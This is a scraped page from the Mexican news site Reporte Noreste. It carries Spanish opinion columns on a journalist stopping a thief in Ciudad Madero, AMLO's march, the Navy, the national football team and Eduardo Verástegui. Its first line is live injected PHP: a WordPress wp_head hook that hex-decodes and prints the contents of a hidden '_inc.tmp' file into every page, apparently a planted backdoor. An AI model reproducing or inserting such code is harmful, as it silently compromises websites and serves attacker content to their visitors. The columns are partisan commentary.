if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } El miedo de un periodista en Tamaulipas – Reporte Noreste
Connect with us

@dect1608

La delincuencia organizada y la no tan bien estructurada, llevan varios años haciendo de las suyas en Tamaulipas. El sector comercial, empresarial y hasta el periodismo local, han sido victimizados por los delincuentes que tienen un dominio casi total de la vida en la entidad y a través del miedo controlan todo.

En los 43 municipios de Tamaulipas, hay una fuerte presencia policiaca, naval y militar que en conjunto se le denomina, Grupo de Coordinación, pese a esto, insisto, el miedo camina al lado de cada tamaulipeco y los robos, asaltos, secuestros, violaciones y asesinatos son tema de todos los días por lo que hacerle frente a la delincuencia es una tarea que pocos se atreven y precisamente, este miércoles, el periodista Luis García Castillo, corresponsal de un diario veracruzano y director del portal informativo www.reportenoreste.com.mx evitó la huida de un ladrón en plena zona centro de ciudad Madero; Luis, en primer instancia debido a su instinto reporteril, grabó la corrida del malhechor, pero al percatarse que este sujeto se escapaba de algunas personas que intentaron detenerlo, optó por tomar acción y agarró fuerzas dejando de lado el miedo y decidió ir tras el ladrón que instantes antes, había robado una tienda de artículos deportivos ubicada atrás de la presidencia de Madero, García Castillo, logró alcanzarlo y lo sometió, no solo fue testigo de la inseguridad que impera en la entidad del noreste de México, se convirtió en el héroe fugaz de una ciudad azorada por los malandros quienes hacen de las suyas a plena luz del día, sin importar la gran presencia de los elementos del Grupo de Coordinación Tamaulipas. Vaya que dejar el miedo y las constantes amenazas de las que se es víctima por estos lares, no impidió al director del portal informativo, asumir su rol de ciudadano y contribuir con la justicia local; ya teniendo al “presunto delincuente” –por ley, me veo obligado a manejar la presunción- llegó la Gendarmería Nacional, para llevarlo a la barandilla municipal.

El delincuente se identificó como Héctor Márquez de 45 años, de edad e identificado por las empleadas de la tienda  “Contreras”, todo ocurrió cerca de las 12 del mediodía, su peor error no fue el robo, sino cruzar por enfrente de la presidencia Municipal donde se encontraba el periodista tamaulipeco quien pudo detenerlo y logró recuperar lo robado.

Esta parece una historia de película, obvio, conforme avanzaron las horas del día, y el alma regreso al cuerpo del periodista, no falto  el bullying  bromista entre sus compañeros que lo llamaron “Súper pillo” pues es su apelativo de cariño entre los representantes de los medios de comunicación de la zona costa de Tamaulipas.

davidcastellanost@hotmail.com

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Opinión

A la #MarchaEl27

Published

on

El presidente de México será arropado por sus amlovers este fin de semana cuando se reúnan para marchar como zombis en la Ciudad de México gobernada por Martí Batres, digo Batres Guadarrama, porque Claudia Sheinbaum Pardo “la marioneta” ya anda en franca campaña.

Tengo familiares, amigos y conocidos que van a ir a la marcha, dicen que van por sus propios méritos, no les creo, si nunca han salido de vacaciones y a veces no tienen ni para pagar la renta, y otros se dicen empresarios, pero sólo porque tienen gente muy cercana en el Gabinete presidencial han logrado construir, no está mal, sólo que se siente feo que se mientan ellos solos.

De entre los que andan animados para trasladarse a la Ciudad de México también están los que votaron por Andrés Manuel en 2018, pero su calidad de vida es la misma, son como esos obreros que se roban una herramienta, un poco de lo que el patrón tiene y terminan exponiendo su trabajo hasta perder lo que han logrado, porque los cachan y son dados de baja. Ahora ni patrimonio ni nada; bueno, así algunos de mis conocidos que van andar en la marcha del 27.

También habrá los adinerados, los de arriba machuchones, fifís, uno que otro Whitexican que comulga con el dinero, los lujos y el jet set, pero se da baños de pueblo y por supuesto, también les gusta el dinero como a usted y a mí.

Pero bueno, toca verlos disfrutar lo que más saben, aplaudir, aplaudir y repetir lo que dicta el emperador.

En la intimidad… Mañana gana la Selección Mexicana de Fútbol, va a pasar a octavos de final y jugará el quinto partido tan añorado, es más, la madurez de los jugadores -es el segundo selectivo más longevo en Qatar- hará de este equipo uno de los más exitosos en la historia del balompié nacional.   

PD: Úrsula Patricia Salazar ¿la ubica?, si no, busque su nombre en internet, no pierde nada.

davidcastellanost@hotmail.com
@dect1608

Continue Reading

Opinión

La Marina de Guerra

Published

on

La Secretaría de Marina-Armada de México (SEMAR), celebró  ayer como cada año, la memorable fecha del 23 de noviembre de 1825 cuando se izó el lábaro patrio en el Castillo de San Juan de Ulúa, acto con el que se consolidó la Independencia Nacional de la Mar. 

Estaba recién integrada la Marina de Guerra mexicana, cuando logró la rendición de las tropas españolas que se resistían a reconocer la Independencia de Mexico; estas se habían atrincherado durante varios años en la fortaleza de San Juan de Ulúa, hasta que finalmente, después de 4 años de conflicto, México logró la victoria.

Pero fue hasta 1992 que por decreto presidencial del entonces comandante supremo Carlos Salinas de Gortari, hombre omnipresente, todo poderoso, y creador del actual sistema político gubernamental llamado 4T,  que se  conmemoró por primera vez el día de la Armada de México.

En el marco de tan distinguida celebración la SEMAR, presentó su informe mensual de las operaciones de seguridad; el Almirante José Rafael Ojeda Durán, Secretario de Marina, quien destacó entre los resultados, el aseguramiento de tres paquetes con mercancía ilícita y 35 mil 985 kilogramos de carbón vegetal contaminado con cocaína.

También se han detenido en el Aeropuerto Internacional de la Ciudad de México (AICM), 2 mil 300 personas inadmitidas, y mediante la inspección de maletas y aeronaves 9 mil 300 acciones, la detección y aseguramiento de  8 mil 300 kilogramos de material ilícito.

La Marina Armada de México, por tierra, por aire y por mar con más de 252 mil 093 elementos de las Fuerzas Armadas y de la Guardia Nacional, de los cuales 58 mil 959 realizan actividades de apoyo logístico están al servicio y cuidado de la nación para que usted viva mejor.

Honor, deber, lealtad y patriotismo; eso es la SEMAR.

En la intimidad… Agárrense que  Chucho Nader inició una nueva obra de pavimentación, y esta es en la borreguera.

Chucho “brilla”, aplicó ya en este 2022 un paquete de obra superior a los 200 millones de pesos que han sido destinados sobre todo en el mejoramiento vial.

Chucho está cumpliendo con sus compromisos, y una dinámica similar trae Armando Martínez Manríquez, alcalde de Altamira como que ya va terminando de ajustarse el cinturón, aguas.

davidcastellanost@hotmail.com
@dect1608

Continue Reading

Opinión

El Tata debió llevar a Carlos Acevedo ¡ptm!

Published

on

El estratega argentino de la Selección Mexicana de fútbol es uno de los seis directores técnicos que más ganan en el mundial de Qatar 2022. Algo así como 3 millones 583 mil 277 pesos mensuales; 895 mil 819 semanales y/o más claro, 127 mil 975 pesos diarios y el muy canijo no llevó a Carlos Acevedo, portero del Club Santos ¡QPM!

Pero centrémonos en el guardameta Guillermo Ochoa Magaña, el cinco copas, el primer portero mexicano en atajar un penalti en 92 años fuera de una tanda de cobros desde los once pasos, el mejor de la historia por encima de Jorge Campos y Antonio “La Tota” Carbajal, no hay discusión, el que no acepte es un ciego y testarudo “aficionado al fútbol”.

Pero sabe, el partido de México vs Polonia me hizo entender esa famosa frase: “Cada pueblo o nación tiene el gobierno que se merece”, me dicen, la dijo el político y pensador Joseph de Maistre, aunque hay otra similar: “No es que la gente tenga el Gobierno que se merece, sino que tienen a los gobernantes que se le parecen”, esa fue del novelista André Malraux, y creo que tiene razón. ¿Sabe por qué? La respuesta la tendrá en la siguiente fracción del texto.

Seguramente algunos de ustedes se preguntarán cómo es que Morena ganó la presidencia en 2018, y viene avasallando en todos los cargos politico-electorales, pues claro, todos o bien, casi todos ustedes son, igualitos a Andrés Manuel López Obrador.

Usted así como el presidente es incapaz de reconocer algo bueno, carente de humildad, también como el tabasqueño es un sábelo todo; un tirano opinando y agrediendo verbalmente sin mirar ni reconocer el esfuerzo y/o sacrificio de los demás.

Ahora tiene sentido lo que dijo André Malraux. Años y años han pasado, y siempre invariablemente siguen denostando el trabajo, dedicación, sacrificio y esfuerzo de Memo Ochoa, un deportista de alto rendimiento que en ocasiones ha sacrificado el confort para elevar su nivel deportivo; le toca por su profesión alejarse de los que ama, ver crecer a sus hijos a la distancia y acompañar a sus familiares y amigos en momentos difíciles vía la tecnología en comunicaciones como lo dejó claro en la entrevista después del juego donde le atajó un penalti a la estrella polaca Robert Lewandowski, el 9 imparable del Barcelona.

Así como usted que nunca ha reconocido nada a Memo, el mismo Andrés Manuel jamás tendrá un ápice de humildad para decir que los anteriores gobernantes fueron capaces de cimentar las finanzas gubernamentales que le permiten a él regalar tanto dinero y echar andar su andamiaje clientelar. Ni usted ni AMLO reconocen las cosas buenas, no saben ver lo positivo de un proceso, de un proyecto. de una acción como le sucede a don Guillermo Ochoa Magaña, el guardameta que no se achicó contra Lewandowski, como tampoco lo había hecho contra los alemanes en 2018 o ante Neymar JR en Brasil 2014. Memo Ochoa lleva años en óptimo nivel con resultados favorables y por supuesto, uno que otro error, es humano, de carne y hueso como usted sólo con una diferencia, él está en el mundial, antes y durante toda su carrera con mucho trabajo invisible, gratitud y reconocimiento a sus compañeros y rivales deportivos, y también si esto lo hace feliz con mucha, mucha, pero mucha suerte de portero, pero sabe, para correr con esa fortuna se debe estar cuidando la portería y aquí, ni usted ni yo estamos con los guantes puestos, así que si pretende que las cosas cambien para bien en México comience con usted, reconozca y valore por mínimo que sea el detalle, porque de lo contrario todo va directo al carajo.

En la intimidad… El futuro de México comienza en ti, no en lo que dejó hacer el de enfrente, así que a dar resultados, no que muy felones ¿o tienen miedo?

Por cierto, Tamaulipas va lento.

PD: Sí, el Tata debió llevar a Carlos Acevedo que a mi parecer es y será el heredero de la portería luego de que Memo Ochoa no pueda ir más a un mundial de fútbol.

davidcastellanost@hotmail.com
@dect1608

Continue Reading

Opinión

En la luna no, los pies en la tierra

Published

on

Todos conocen a Jennifer López y por consiguiente, todos saben que Eduardo Verástegui participó en un video con ella, pero no es solo eso: el actor y productor de cine hace streaming y reúne a más de 200 mil rezando el Rosario. Otra vez Andrés Manuel, miente.

El presidente de México aplicó la típica respuesta ante el dolor por un señalamiento rotundo y certero: “ni lo topo”, suele decir la gente. En esta ocasión el mandatario aseguró que apenas hace dos meses supo de la existencia de Eduardo Verástegui el actor de origen tamaulipeco que lo responsabilizó del avance sistemático del socialismo en nuestro país.

El pique entre Verástegui y López Obrador es de gran trascendencia debido a que Eduardo viene en contra de la agenda progresista y de la política pública promovida por el presidente con acciones como la de atacar al Instituto Nacional Electoral (INE), así como la intención obradorista de centrar todo el poder y control en el Estado como hace muchos años no sucedía en México.

El primer misil fue de Andrés Manuel en contra de Eduardo y los participantes de la Conferencia de Acción Política Conservadora (CPAC), a los que llamó «fascistas» y «racistas». Que conste que nuevamente fue el presidente mexicano el que comenzó la guerra de descalificaciones.

Y entocnes, este sábado 19, en el marco del 112 aniversario del inicio de la Revolución Mexicana, el actor oriundo de Xicoténcatl, respondió a AMLO durante la clausura de la primera convención de la CPAC en el país, con un discurso demoledor ante las fechorías antidemocráticas de López Obrador y del desmantelamiento de instituciones, aportando una mayor pobreza, más corrupción, más potencia a las bandas del crimen organizado, sin dejar de mencionar el recorte de libertades y los derechos humanos en un franco camino hacia el narcocomunismo en México.

Claro que el Comandante Supremo sabe o sabía de la existencia de Eduardo Verástegui, pues así como el tamaulipeco, al igual que Andrés son afines a Donald Trump, tanto que el mismo ex presidente norteamericano, felicitó a Verástegui por la primera conferencia CPAC en este país como una franca defensa a la libertad de las Américas, según sus creencias.

De manera peyorativa han llamado «ultra derechistas» a los seguidores y personas afines a este movimiento encabezado por el productor de cine, y estos responden sin titubeos.

Ya que si «ultra  derecha» significa defender la Fe en Cristo, la vida, la patria, la familia, y las libertades, entonces sí, son y serán «ULTRA Derechistas”.

En la intimidad… Este día comienza la nueva aventura de la Selección Mexicana de Fútbol y muchos tampiqueños andan por allá ¿ya los ubicaste?

A todo esto el fin de semana sirvió para hacer turismo religioso. Cerro del Cubilete, San Juan de los Lagos, y de pasadita una escala hambrienta en San Luis Potosí, que bien luce; limpia, segura y con desarrollo económico a la vista; aguas, que en una de esas se les va por la derecha José Ricardo Gallardo Cardona “El Pollo, el gobernador del estado.

davidcastellanost@hotmail.com
@dect1608

Continue Reading

Copyright © 2021 Desarrollado por Design House Tampico